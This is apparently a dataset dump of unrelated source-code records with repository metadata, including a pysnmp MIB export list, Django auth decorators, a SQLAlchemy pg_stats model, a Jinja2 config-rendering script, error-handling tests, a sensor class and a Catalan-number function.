jnxWxVirtEndptEntry=jnxWxVirtEndptEntry, jnxWxQosEndptIdentifier=jnxWxQosEndptIdentifier, jnxWxEventMultiPathStatusChange=jnxWxEventMultiPathStatusChange, jnxWxSysStatsPktsOfPt=jnxWxSysStatsPktsOfPt, jnxWxSysStatsPktsTpIn=jnxWxSysStatsPktsTpIn, jnxWxWpStatsLatencyCount=jnxWxWpStatsLatencyCount, jnxWxQosEndptEntry=jnxWxQosEndptEntry, jnxWxAppStatsEntry=jnxWxAppStatsEntry, jnxWxSysStatsThruputIn=jnxWxSysStatsThruputIn, jnxWxWpStatsAvgLatency=jnxWxWpStatsAvgLatency, jnxWxAppEntry=jnxWxAppEntry, jnxWxWanStatsEntry=jnxWxWanStatsEntry, jnxWxVirtEndptSubnetCount=jnxWxVirtEndptSubnetCount, jnxWxAppAppName=jnxWxAppAppName, PYSNMP_MODULE_ID=jnxWxMibModule, 
jnxWxSysStatsPktSizeOut2=jnxWxSysStatsPktSizeOut2, jnxWxObjs=jnxWxObjs, jnxWxEventMultiNodeMasterUp=jnxWxEventMultiNodeMasterUp, jnxWxBurstStatsBpsOut=jnxWxBurstStatsBpsOut, jnxWxAsmIndex=jnxWxAsmIndex, jnxWxEvents=jnxWxEvents, jnxWxSysStatsPktSizeIn4=jnxWxSysStatsPktSizeIn4, jnxWxWpStatsLastDown=jnxWxWpStatsLastDown, jnxWxQosStatsBytesDropped=jnxWxQosStatsBytesDropped, jnxWxConfMib=jnxWxConfMib, jnxWxQosStatsTable=jnxWxQosStatsTable, jnxWxSysStatsBytesTpPt=jnxWxSysStatsBytesTpPt, jnxWxEventCompressionBufferOverflow=jnxWxEventCompressionBufferOverflow, jnxWxAsmStatsTable=jnxWxAsmStatsTable, jnxWxQosStatsPktsDropped=jnxWxQosStatsPktsDropped, jnxWxAsmStatsPktsIn=jnxWxAsmStatsPktsIn, jnxWxAppAggrStatsEntry=jnxWxAppAggrStatsEntry, jnxWxAppStatsTable=jnxWxAppStatsTable, jnxWxSysStatsBytesOutAe=jnxWxSysStatsBytesOutAe, jnxWxSysStatsPktsInRe=jnxWxSysStatsPktsInRe, jnxWxSysStatsBytesPtFilter=jnxWxSysStatsBytesPtFilter, jnxWxEventMultiNodeMasterDown=jnxWxEventMultiNodeMasterDown, jnxWxSysStatsBytesInAe=jnxWxSysStatsBytesInAe, jnxWxStatsQosClassCount=jnxWxStatsQosClassCount, jnxWxSysStatsPktSizeOut4=jnxWxSysStatsPktSizeOut4, jnxWxSysStatsPktSizeOut5=jnxWxSysStatsPktSizeOut5, jnxWxWpStatsLossPercent=jnxWxWpStatsLossPercent, jnxWxStatsVirtEndptCount=jnxWxStatsVirtEndptCount, jnxWxWpStatsLatencyThresh=jnxWxWpStatsLatencyThresh, jnxWxQosEndptTable=jnxWxQosEndptTable, jnxWxWpStatsLatencyAboveThreshCount=jnxWxWpStatsLatencyAboveThreshCount, jnxWxSysStatsPktsOutRe=jnxWxSysStatsPktsOutRe, jnxWxEventSecondaryRegServerUnreachable=jnxWxEventSecondaryRegServerUnreachable, jnxWxEventDiskFailure=jnxWxEventDiskFailure, jnxWxEventWanPerfStatusChange=jnxWxEventWanPerfStatusChange, jnxWxSysStatsPeakRdn=jnxWxSysStatsPeakRdn, jnxWxVirtEndptIndex=jnxWxVirtEndptIndex, jnxWxWpStatsEventCount=jnxWxWpStatsEventCount, jnxWxQosClassTable=jnxWxQosClassTable, jnxWxSysStatsPktSizeOut1=jnxWxSysStatsPktSizeOut1, jnxWxAccelAppNameTable=jnxWxAccelAppNameTable, jnxWxAccelAppName=jnxWxAccelAppName, 
jnxWxBurstStatsBpsIn=jnxWxBurstStatsBpsIn, jnxWxAccelAppTimeWithAccel=jnxWxAccelAppTimeWithAccel, jnxWxSysStatsBytesTpOut=jnxWxSysStatsBytesTpOut, jnxWxEventEventsV2=jnxWxEventEventsV2, jnxWxWpStatsEntry=jnxWxWpStatsEntry, jnxWxEventPrimaryUpBackupDisengaged=jnxWxEventPrimaryUpBackupDisengaged, jnxWxWanStatsBytesToWan=jnxWxWanStatsBytesToWan, jnxWxEventDCQAboveHiWatermark=jnxWxEventDCQAboveHiWatermark, jnxWxAppTable=jnxWxAppTable, jnxWxVirtEndptTable=jnxWxVirtEndptTable, jnxWxWpEndptTable=jnxWxWpEndptTable, jnxWxAppStatsEstBoostBytes=jnxWxAppStatsEstBoostBytes, jnxWxMibModule=jnxWxMibModule, jnxWxEventMultiNodeLastUp=jnxWxEventMultiNodeLastUp, jnxWxAccelAppStatsTable=jnxWxAccelAppStatsTable, jnxWxEventCompressionSessionClosed=jnxWxEventCompressionSessionClosed, jnxWxQosStatsBytesOut=jnxWxQosStatsBytesOut, jnxWxEventPrimaryDownBackupEngaged=jnxWxEventPrimaryDownBackupEngaged, jnxWxAsmIpAddress=jnxWxAsmIpAddress, jnxWxSysStatsBytesOutOob=jnxWxSysStatsBytesOutOob, jnxWxWanStatsTable=jnxWxWanStatsTable, jnxWxSysStatsPktSizeIn6=jnxWxSysStatsPktSizeIn6, jnxWxSysStatsBytesOfPt=jnxWxSysStatsBytesOfPt, jnxWxAppAggrStatsBytesInPercent=jnxWxAppAggrStatsBytesInPercent, jnxWxAccelAppStatsEntry=jnxWxAccelAppStatsEntry, jnxWxWpEndptIp=jnxWxWpEndptIp, jnxWxAppStatsBytesInPercent=jnxWxAppStatsBytesInPercent, jnxWxStatsAppCount=jnxWxStatsAppCount, jnxWxAsmStatsPktsOut=jnxWxAsmStatsPktsOut, jnxWxWanStatsBytesFromWan=jnxWxWanStatsBytesFromWan, jnxWxEventDecompressionSessionClosed=jnxWxEventDecompressionSessionClosed, jnxWxAsmTable=jnxWxAsmTable, jnxWxSysStatsPktSizeOut3=jnxWxSysStatsPktSizeOut3, jnxWxSysStatsBytesInRe=jnxWxSysStatsBytesInRe, jnxWxQosStatsPktsOut=jnxWxQosStatsPktsOut, jnxWxStatsUpdateTime=jnxWxStatsUpdateTime, jnxWxSysStatsPktsInAe=jnxWxSysStatsPktsInAe, jnxWxAppStatsBytesOut=jnxWxAppStatsBytesOut, jnxWxAppStatsBytesIn=jnxWxAppStatsBytesIn, jnxWxAppStatsAccelBytesIn=jnxWxAppStatsAccelBytesIn, jnxWxAsmStatsBytesIn=jnxWxAsmStatsBytesIn, 
jnxWxSysStatsBytesTpIn=jnxWxSysStatsBytesTpIn, jnxWxEventEvents=jnxWxEventEvents, jnxWxBurstStats=jnxWxBurstStats, jnxWxSysStatsPktSizeOut6=jnxWxSysStatsPktSizeOut6, jnxWxAppIndex=jnxWxAppIndex, jnxWxEventDCQBelowHiWatermark=jnxWxEventDCQBelowHiWatermark, jnxWxWpEndptIndex=jnxWxWpEndptIndex, jnxWxVirtEndptName=jnxWxVirtEndptName, jnxWxEventObjs=jnxWxEventObjs, jnxWxEventClientLinkDown=jnxWxEventClientLinkDown, jnxWxMib=jnxWxMib, jnxWxQosEndptIndex=jnxWxQosEndptIndex, jnxWxAccelAppIndex=jnxWxAccelAppIndex, jnxWxWpStatsReturnCount=jnxWxWpStatsReturnCount, jnxWxSysStatsPktsTpOut=jnxWxSysStatsPktsTpOut, jnxWxAppStatsBytesOutWxc=jnxWxAppStatsBytesOutWxc, jnxWxStatsAccelAppCount=jnxWxStatsAccelAppCount, jnxWxWpStatsMinuteCount=jnxWxWpStatsMinuteCount, jnxWxAsm=jnxWxAsm, jnxWxAppStatsActiveSessionTime=jnxWxAppStatsActiveSessionTime, jnxWxEventDecompressionSessionOpened=jnxWxEventDecompressionSessionOpened, jnxWxSysStatsPktSizeIn2=jnxWxSysStatsPktSizeIn2, jnxWxEventPrimaryRegServerUnreachable=jnxWxEventPrimaryRegServerUnreachable, jnxWxQosClassIndex=jnxWxQosClassIndex, jnxWxEventClientLinkUp=jnxWxEventClientLinkUp, jnxWxAppAggrStatsTable=jnxWxAppAggrStatsTable, jnxWxAppAggrStatsBytesInRe=jnxWxAppAggrStatsBytesInRe, jnxWxSysStatsPktsPtNoAe=jnxWxSysStatsPktsPtNoAe, jnxWxQosStatsEntry=jnxWxQosStatsEntry, jnxWxEventRipAuthFailure=jnxWxEventRipAuthFailure, jnxWxStatsWpEndptCount=jnxWxStatsWpEndptCount, jnxWxWpStatsDiversionCount=jnxWxWpStatsDiversionCount, jnxWxEventMultiNodeLastDown=jnxWxEventMultiNodeLastDown, jnxWxQosClassName=jnxWxQosClassName, jnxWxEventPrimaryDownBackupEngageFailed=jnxWxEventPrimaryDownBackupEngageFailed, jnxWxSysStatsPktSizeIn5=jnxWxSysStatsPktSizeIn5, jnxWxWpStatsUnavailableCount=jnxWxWpStatsUnavailableCount, jnxWxEventPerformanceThreshCrossed=jnxWxEventPerformanceThreshCrossed, jnxWxQosClassEntry=jnxWxQosClassEntry, jnxWxAsmStatsEntry=jnxWxAsmStatsEntry, jnxWxWanPerf=jnxWxWanPerf)
| 117.216292 | 7,837 | 0.767835 | 4,695 | 41,729 | 6.824068 | 0.067093 | 0.012485 | 0.015637 | 0.020725 | 0.395768 | 0.384719 | 0.304816 | 0.277599 | 0.226692 | 0.16689 | 0 | 0.085295 | 0.086606 | 41,729 | 355 | 7,838 | 117.546479 | 0.755293 | 0.007884 | 0 | 0 | 0 | 0 | 0.099756 | 0.026455 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025862 | 0 | 0.025862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
26bca4635602b2dea4dadcc1b88a6836226fb74e | 2,524 | py | Python | backend/tensor_site/decorators.py | b3none/Tensor | 6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba | [
"MIT"
] | null | null | null | backend/tensor_site/decorators.py | b3none/Tensor | 6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba | [
"MIT"
] | null | null | null | backend/tensor_site/decorators.py | b3none/Tensor | 6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba | [
"MIT"
] | 3 | 2021-09-06T18:01:52.000Z | 2021-10-18T02:49:53.000Z | # All of this code is a snippet lifted from several Stack Overflow threads.
# It creates a decorator that checks whether a user is properly authenticated,
# and redirects them to the login page otherwise. Django does not do that last part on its own...
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import login_required
from steam.steamid import SteamID
from sourcebans.models import SbAdmins
default_message = "You must login first"
def user_passes_test(test_func, message=default_message):
"""
Decorator for views that checks that the user passes the given test,
setting a message in case of no success. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if not test_func(request.user):
messages.error(request, message)
return view_func(request, *args, **kwargs)
return _wrapped_view
return decorator
def login_required_message(function=None, message=default_message):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated,
message=message,
)
if function:
return actual_decorator(function)
return actual_decorator
def login_required_message_and_redirect(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None, message=default_message):
if function:
return login_required_message(
login_required(function, redirect_field_name, login_url),
message
)
return lambda deferred_function: login_required_message_and_redirect(deferred_function, redirect_field_name, login_url, message)
def admin_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
    def is_admin(u):
        if not u.is_authenticated:
            return False
        if u.is_superuser:
            return True
        steamid = SteamID(u.steamid).as_steam2
        # filter().exists() avoids the DoesNotExist that .get() raises for non-admins
        return SbAdmins.objects.filter(authid=steamid).exists()
actual_decorator = user_passes_test(
lambda u: is_admin(u)
)
if function:
return actual_decorator(function)
return actual_decorator | 32.779221 | 138 | 0.765055 | 357 | 2,524 | 5.226891 | 0.364146 | 0.048767 | 0.063773 | 0.062165 | 0.340836 | 0.340836 | 0.340836 | 0.259378 | 0.259378 | 0.19507 | 0 | 0.001435 | 0.171553 | 2,524 | 77 | 139 | 32.779221 | 0.890961 | 0.269414 | 0 | 0.191489 | 0 | 0 | 0.011111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148936 | false | 0.06383 | 0.170213 | 0 | 0.553191 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
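The `user_passes_test` pattern in the decorators module above is framework-agnostic; a minimal dependency-free sketch of it follows, with a plain dict standing in for Django's request object and a list standing in for the messages framework (both are illustrative assumptions, not Django's API). Note that, like the original, the wrapper only records a message when the test fails and still runs the view:

```python
from functools import wraps

default_message = "You must login first"

def user_passes_test(test_func, message=default_message):
    """Record a message when the test fails, then run the view regardless."""
    def decorator(view_func):
        @wraps(view_func)
        def _wrapped_view(request, *args, **kwargs):
            if not test_func(request["user"]):
                request.setdefault("messages", []).append(message)
            return view_func(request, *args, **kwargs)
        return _wrapped_view
    return decorator

@user_passes_test(lambda u: u.get("is_authenticated", False))
def view(request):
    return "ok"

authed = {"user": {"is_authenticated": True}}
anon = {"user": {}}
assert view(authed) == "ok" and "messages" not in authed
assert view(anon) == "ok" and anon["messages"] == [default_message]
```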
26c4cd3412477aa9a4e2d8f9807e5a95e1651606 | 2,136 | py | Python | navigator/models.py | nmussat/Navigator | 38bc8cb31367bfc9ebc780c99ab40269091508f6 | [
"MIT"
] | null | null | null | navigator/models.py | nmussat/Navigator | 38bc8cb31367bfc9ebc780c99ab40269091508f6 | [
"MIT"
] | null | null | null | navigator/models.py | nmussat/Navigator | 38bc8cb31367bfc9ebc780c99ab40269091508f6 | [
"MIT"
] | 1 | 2021-10-07T19:56:40.000Z | 2021-10-07T19:56:40.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import OrderedDict
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy.dialects import postgresql
from sqlalchemy.types import TypeDecorator
db = SQLAlchemy()
class AnyArray(TypeDecorator):
impl = db.TEXT
def process_bind_param(self, value, dialect):
if value is None:
return value
if not value:
return '{}'
return '{{"{}"}}'.format('","'.join(value))
def process_result_value(self, value, dialect):
if value is None:
return value
if isinstance(value, list):
return value
if not value:
return []
        # Only decode when the driver hands back raw bytes; str is already Unicode
        if isinstance(value, bytes):
            value = value.decode('utf-8')
# TODO: Enhance field decoding (eg. core_user.created)
return value.strip('{}"').split(',')
# TODO: make the model read-only
class PGStats(db.Model):
__tablename__ = 'pg_stats'
schema = db.Column('schemaname', db.TEXT(), primary_key=True)
table = db.Column('tablename', db.TEXT(), primary_key=True)
column = db.Column('attname', db.TEXT(), primary_key=True)
inherited = db.Column('inherited', db.BOOLEAN())
null_frac = db.Column('null_frac', db.REAL())
avg_width = db.Column('avg_width', db.INTEGER())
n_distinct = db.Column('n_distinct', db.REAL())
most_common_vals = db.Column('most_common_vals', AnyArray())
most_common_freqs = db.Column('most_common_freqs', AnyArray())
histogram_bounds = db.Column('histogram_bounds', AnyArray())
correlation = db.Column('correlation', db.REAL())
most_common_elems = db.Column('most_common_elems', AnyArray())
most_common_elem_freqs = db.Column('most_common_elem_freqs', postgresql.ARRAY(db.REAL))
elem_count_histogram = db.Column('elem_count_histogram', postgresql.ARRAY(db.REAL))
def to_dict(self):
result = OrderedDict()
for key in self.__mapper__.columns.keys():
result[key] = getattr(self, key)
return result
| 34.451613 | 91 | 0.663858 | 268 | 2,136 | 5.085821 | 0.399254 | 0.082172 | 0.035216 | 0.052825 | 0.169479 | 0.091709 | 0.061629 | 0.061629 | 0.061629 | 0.061629 | 0 | 0.001181 | 0.207397 | 2,136 | 61 | 92 | 35.016393 | 0.803898 | 0.076779 | 0 | 0.159091 | 0 | 0 | 0.107833 | 0.01119 | 0 | 0 | 0 | 0.016393 | 0 | 1 | 0.068182 | false | 0 | 0.113636 | 0 | 0.772727 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
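The bind/result logic in `AnyArray` above is a string round-trip over Postgres-style array literals. A standalone sketch of that round-trip is below; unlike the original, which applies a single `strip('{}"')` to the whole string (trimming only at the ends, hence the TODO comments), this version strips quotes per element. It stays naive about embedded commas and escapes, matching the original's limitations:

```python
def encode_any_array(values):
    """Render a list as a Postgres-style array literal, e.g. '{"a","b"}'."""
    if values is None:
        return None
    if not values:
        return '{}'
    return '{{"{}"}}'.format('","'.join(values))

def decode_any_array(literal):
    """Parse a literal back into a list; quotes are stripped per element."""
    if literal is None:
        return None
    body = literal.strip('{}')
    if not body:
        return []
    return [part.strip('"') for part in body.split(',')]

assert decode_any_array(encode_any_array(['a', 'b'])) == ['a', 'b']
assert decode_any_array('{a,b}') == ['a', 'b']
assert encode_any_array([]) == '{}'
```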
26dd9d8d667f977ffc2bddba99241cfb4d40b617 | 2,518 | py | Python | configure_templates.py | kumc-bmi/shrine-docker-image | a9f917912e7c4178157518d7b241ee11c096a64d | [
"BSD-3-Clause"
] | null | null | null | configure_templates.py | kumc-bmi/shrine-docker-image | a9f917912e7c4178157518d7b241ee11c096a64d | [
"BSD-3-Clause"
] | null | null | null | configure_templates.py | kumc-bmi/shrine-docker-image | a9f917912e7c4178157518d7b241ee11c096a64d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
import os
from jinja2 import Environment, FileSystemLoader
file_loader = FileSystemLoader('/opt/templates')
env = Environment(loader=file_loader)
template = env.get_template('shrine.conf.j2')
output = template.render(shrineDatabaseType=os.environ['SHRINE_DB_TYPE'],
hive_password=os.environ['SHRINE_HIVE_PASSWORD'],
keystore_password=os.environ['SHRINE_KEYSTORE_PASSWORD']) # noqa
f = open("/usr/local/tomcat/lib/shrine.conf", "w")
f.write(output)
f.close()
template = env.get_template('context.xml.j2')
# there must be a better way to do this
output = template.render(shrineDatabaseType=os.environ['SHRINE_DB_TYPE'],
problemDB_user=os.environ['SHRINE_PROBLEMDB_USER'], # noqa
problemDB_pass=os.environ['SHRINE_PROBLEMDB_PASS'], # noqa
problemDB_driver=os.environ['SHRINE_PROBLEMDB_DRIVER'], # noqa
problemDB_url=os.environ['SHRINE_PROBLEMDB_URL'], # noqa
shrineDB_user=os.environ['SHRINE_SHRINEDB_USER'], # noqa
shrineDB_pass=os.environ['SHRINE_SHRINEDB_PASS'], # noqa
shrineDB_driver=os.environ['SHRINE_SHRINEDB_DRIVER'], # noqa
shrineDB_url=os.environ['SHRINE_SHRINEDB_URL'], # noqa
adapterAuditDB_user=os.environ['SHRINE_ADAPTERAUDITDB_USER'], # noqa
adapterAuditDB_pass=os.environ['SHRINE_ADAPTERAUDITDB_PASS'], # noqa
adapterAuditDB_driver=os.environ['SHRINE_ADAPTERAUDITDB_DRIVER'], # noqa
adapterAuditDB_url=os.environ['SHRINE_ADAPTERAUDITDB_URL'], # noqa
qepAuditDB_user=os.environ['SHRINE_QEPAUDITDB_USER'], # noqa
qepAuditDB_pass=os.environ['SHRINE_QEPAUDITDB_PASS'], # noqa
qepAuditDB_driver=os.environ['SHRINE_QEPAUDITDB_DRIVER'], # noqa
qepAuditDB_url=os.environ['SHRINE_QEPAUDITDB_URL'], # noqa
stewardDB_user=os.environ['SHRINE_STEWARDDB_USER'], # noqa
stewardDB_pass=os.environ['SHRINE_STEWARDDB_PASS'], # noqa
stewardDB_driver=os.environ['SHRINE_STEWARDDB_DRIVER'], # noqa
stewardDB_url=os.environ['SHRINE_STEWARDDB_URL']
)
f = open("/usr/local/tomcat/conf/context.xml", "w")
f.write(output)
f.close()
| 55.955556 | 97 | 0.619539 | 263 | 2,518 | 5.65019 | 0.21673 | 0.145357 | 0.242261 | 0.06393 | 0.130552 | 0.10498 | 0.079408 | 0.079408 | 0.079408 | 0 | 0 | 0.002188 | 0.274027 | 2,518 | 44 | 98 | 57.227273 | 0.810722 | 0.061557 | 0 | 0.162162 | 0 | 0 | 0.268261 | 0.186672 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.189189 | 0.054054 | 0 | 0.054054 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
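The repeated `os.environ[...]` keyword arguments in the script above can be collapsed into a single mapping and a dict comprehension. A minimal sketch of that idea follows, using the stdlib `string.Template` in place of Jinja2 so it stays self-contained; the variable and environment names here are purely illustrative, not the real shrine configuration keys:

```python
import os
from string import Template

def render_from_env(template_text, var_to_env):
    """Build the template context from the environment in one comprehension."""
    context = {var: os.environ[env] for var, env in var_to_env.items()}
    return Template(template_text).substitute(context)

# Illustrative names only -- not the real shrine config keys.
os.environ["DEMO_DB_USER"] = "shrine"
rendered = render_from_env("user=$db_user", {"db_user": "DEMO_DB_USER"})
assert rendered == "user=shrine"
```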
26ee085bd32572ff40cf2197f756c83189545036 | 2,314 | py | Python | modules/tests/photons_transport_tests/test_catch_errors.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 51 | 2020-07-03T08:34:48.000Z | 2022-03-16T10:56:08.000Z | modules/tests/photons_transport_tests/test_catch_errors.py | delfick/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 81 | 2020-07-03T08:13:59.000Z | 2022-03-31T23:02:54.000Z | modules/tests/photons_transport_tests/test_catch_errors.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 8 | 2020-07-24T23:48:20.000Z | 2021-05-24T17:20:16.000Z | # coding: spec
from photons_transport import catch_errors
from photons_app.errors import RunErrors, PhotonsAppError
from photons_app import helpers as hp
from delfick_project.errors_pytest import assertRaises
describe "throw_error":
it "passes on errors if error_catcher is a callable":
es = []
def ec(e):
es.append(e)
e1 = ValueError("NOPE")
e2 = ValueError("NUP")
with catch_errors(ec) as error_catcher:
hp.add_error(error_catcher, e1)
raise e2
assert error_catcher is ec
assert es == [e1, e2]
it "passes on errors if error_catcher is a list":
es = []
e1 = ValueError("NOPE")
e2 = ValueError("NUP")
with catch_errors(es) as error_catcher:
hp.add_error(error_catcher, e1)
raise e2
assert error_catcher is es
assert es == [e1, e2]
it "does nothing if no errors":
with catch_errors():
pass
es = []
def ec(e):
es.append(e)
with catch_errors(ec):
pass
assert es == []
with catch_errors(es):
pass
assert es == []
it "throws the error if just one":
with assertRaises(ValueError, "NOPE"):
with catch_errors():
raise ValueError("NOPE")
it "merges multiple of the same error together":
e1 = PhotonsAppError("yeap", a=1)
e2 = PhotonsAppError("yeap", a=1)
with assertRaises(PhotonsAppError, "yeap", a=1):
with catch_errors() as ec:
hp.add_error(ec, e1)
raise e2
with assertRaises(PhotonsAppError, "yeap", a=1):
with catch_errors() as ec:
hp.add_error(ec, e1)
hp.add_error(ec, e2)
it "combines multiple of different errors into a RunErrors":
e1 = PhotonsAppError("yeap", a=1)
e2 = PhotonsAppError("yeap", b=1)
with assertRaises(RunErrors, _errors=[e1, e2]):
with catch_errors() as ec:
hp.add_error(ec, e1)
raise e2
with assertRaises(RunErrors, _errors=[e2, e1]):
with catch_errors() as ec:
hp.add_error(ec, e2)
hp.add_error(ec, e1)
| 26 | 65 | 0.554451 | 283 | 2,314 | 4.409894 | 0.222615 | 0.096955 | 0.120192 | 0.057692 | 0.5625 | 0.516026 | 0.516026 | 0.488782 | 0.418269 | 0.266827 | 0 | 0.022667 | 0.351772 | 2,314 | 88 | 66 | 26.295455 | 0.809333 | 0.005186 | 0 | 0.634921 | 0 | 0 | 0.12913 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 0 | null | null | 0.079365 | 0.063492 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
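The behavior these specs exercise (accumulate errors in a list or callable catcher, re-raise a lone error, combine several) can be sketched as a plain context manager without the photons machinery. This is a simplified stand-in: `CombinedErrors` plays the role of `RunErrors`, it always yields a list to append to rather than the catcher itself, and it omits the merging of duplicate errors that one spec relies on:

```python
from contextlib import contextmanager

class CombinedErrors(Exception):
    """Stand-in for photons' RunErrors: carries the collected errors."""
    def __init__(self, errors):
        self.errors = errors
        super().__init__("{} errors".format(len(errors)))

@contextmanager
def catch_errors(error_catcher=None):
    errors = error_catcher if isinstance(error_catcher, list) else []
    try:
        yield errors
    except Exception as error:
        errors.append(error)
    if callable(error_catcher):
        for error in errors:
            error_catcher(error)          # a callable catcher consumes everything
    elif error_catcher is None:
        if len(errors) == 1:
            raise errors[0]               # a single error is re-raised as itself
        if errors:
            raise CombinedErrors(errors)  # several errors are combined

es = []
with catch_errors(es):
    raise ValueError("NOPE")
assert len(es) == 1
```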
26f4eadc70e27aa1e98f38da3c8d30e443528f7e | 620 | py | Python | wonderbits/WBUltrasonic.py | daejong123/wb-py-sdk | f77edb435a22bf6d3d37e0ad716117b8680c544b | [
"MIT"
] | 1 | 2019-05-09T07:15:43.000Z | 2019-05-09T07:15:43.000Z | wonderbits/WBUltrasonic.py | daejong123/wb-py-sdk | f77edb435a22bf6d3d37e0ad716117b8680c544b | [
"MIT"
] | null | null | null | wonderbits/WBUltrasonic.py | daejong123/wb-py-sdk | f77edb435a22bf6d3d37e0ad716117b8680c544b | [
"MIT"
] | null | null | null | from .wbits import Wonderbits
def _format_str_type(x):
if isinstance(x, str):
x = str(x).replace('"', '\\"')
x = "\"" + x + "\""
return x
class Ultrasonic(Wonderbits):
def __init__(self, index = 1):
Wonderbits.__init__(self)
self.index = index
def register_distance(self, cb):
self._register_event('ultrasonic{}'.format(self.index), 'distance', cb)
def get_distance(self):
"""
        Get the distance detected by the ultrasonic sensor (cm).
        :rtype: float
"""
command = 'ultrasonic{}.get_distance()'.format(self.index)
return self._get_command(command)
| 23.846154 | 79 | 0.579032 | 69 | 620 | 4.942029 | 0.42029 | 0.105572 | 0.029326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002208 | 0.269355 | 620 | 26 | 80 | 23.846154 | 0.750552 | 0.045161 | 0 | 0 | 0 | 0 | 0.103691 | 0.047452 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.066667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
26f9a11a19644550efcba31e08b36d91ed82c4d9 | 124 | py | Python | experiments/Catalan.py | johnpaulguzman/Algorithm-Analyzer | e93abfb51f2f67b6df1af8d95cc6855ad7de69f2 | [
"MIT"
] | null | null | null | experiments/Catalan.py | johnpaulguzman/Algorithm-Analyzer | e93abfb51f2f67b6df1af8d95cc6855ad7de69f2 | [
"MIT"
] | null | null | null | experiments/Catalan.py | johnpaulguzman/Algorithm-Analyzer | e93abfb51f2f67b6df1af8d95cc6855ad7de69f2 | [
"MIT"
] | null | null | null | def f(n):
if n <=0:
return 1
res = 0
for i in range(n):
res += f(i) * f(n-i-1)
return res | 17.714286 | 30 | 0.403226 | 24 | 124 | 2.083333 | 0.5 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057971 | 0.443548 | 124 | 7 | 31 | 17.714286 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
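The naive recursion above recomputes the same subproblems exponentially many times; memoizing it yields the same values (C(0)..C(5) = 1, 1, 2, 5, 14, 42) in polynomial time:

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def catalan(n):
    """n-th Catalan number via C(n) = sum of C(i) * C(n-1-i), memoized."""
    if n <= 0:
        return 1
    return sum(catalan(i) * catalan(n - 1 - i) for i in range(n))

assert [catalan(n) for n in range(6)] == [1, 1, 2, 5, 14, 42]
```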
26fa4ab137e1cd66b58f73571d25f8fb1027d414 | 312 | py | Python | tests/test_delattribute.py | pylover/pymlconf | 4111ed84b23201957ee789b58e6818f330eeb28b | [
"MIT"
